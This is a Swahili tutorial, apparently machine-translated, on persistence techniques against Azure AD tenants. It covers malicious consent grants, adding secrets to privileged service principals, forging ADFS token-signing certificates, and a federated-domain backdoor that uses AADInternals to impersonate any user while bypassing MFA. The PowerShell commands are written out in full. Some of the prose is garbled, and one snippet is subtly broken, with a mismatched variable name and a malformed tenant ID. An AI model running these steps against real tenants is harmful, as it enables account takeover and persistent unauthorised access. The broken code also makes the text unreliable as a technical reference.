Ruhusa Haramu ya Kutoa Idhini

Kwa chaguo-msingi, mtumiaji yeyote anaweza kujiandikisha programu katika Azure AD. Kwa hivyo unaweza kujiandikisha programu (kwa ajili ya mpangaji wa lengo tu) ambayo inahitaji ruhusa kubwa ya athari na idhini ya msimamizi (na kuipitisha ikiwa wewe ni msimamizi) - kama kutuma barua pepe kwa niaba ya mtumiaji, usimamizi wa jukumu nk. Hii itaturuhusu kutekeleza mashambulizi ya udukuzi ambayo yangekuwa yenye mafanikio sana kwa mafanikio.

Zaidi ya hayo, unaweza pia kukubali programu hiyo na mtumiaji wako kama njia ya kudumisha ufikiaji juu yake.

Programu na Mabwana wa Huduma

Kwa mamlaka ya Msimamizi wa Programu, GA au jukumu la desturi lenye ruhusa za microsoft.directory/applications/credentials/update, tunaweza kuongeza siri (au cheti) kwa programu iliyopo.

Inawezekana kulenga programu yenye ruhusa kubwa au kuongeza programu mpya yenye ruhusa kubwa.

Jukumu la kuvutia la kuongeza kwa programu hiyo litakuwa Jukumu la Msimamizi wa Uthibitishaji wa Kipekee kwani inaruhusu kusahau nenosiri la Wasimamizi wa Kijumla.

Mbinu hii pia inaruhusu kupuuza MFA.

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a

• Kwa uthibitishaji kulingana na cheti

```powershell Connect-AzAccount -ServicePrincipal -Tenant -CertificateThumbprint -ApplicationId ``` ### Umoja - Cheti cha Kusainiwa kwa Alama ya Kidole

Ukiwa na mamlaka ya DA kwenye AD ya ndani, inawezekana kuunda na kuagiza vyeti vipya vya kusaini token na vyeti vya kufyatua token ambavyo vina muda mrefu sana wa uhalali. Hii itatuwezesha kuingia kama mtumiaji yeyote ambaye tunajua ImuutableID yake.

Chukua amri ifuatayo kama DA kwenye seva za ADFS kuunda vyeti vipya (nywila ya chaguo 'AADInternals'), waongeze kwenye ADFS, zima ugeuzaji wa moja kwa moja na anzisha upya huduma:

New-AADIntADFSSelfSignedCertificates

Kisha, sasisha habari ya cheti na Azure AD:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Umoja - Kikoa Kinachotegemewa

Ukiwa na mamlaka ya GA kwenye mpangaji, ni inawezekana kuongeza kikoa kipya ( lazima ithibitishwe), sanidi aina yake ya uwakilishi kuwa Umoja na sanidi kikoa hicho kuwa kinategemea cheti maalum (any.sts katika amri hapa chini) na mtoaji:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

Marejeo

• https://aadinternalsbackdoor.azurewebsites.net/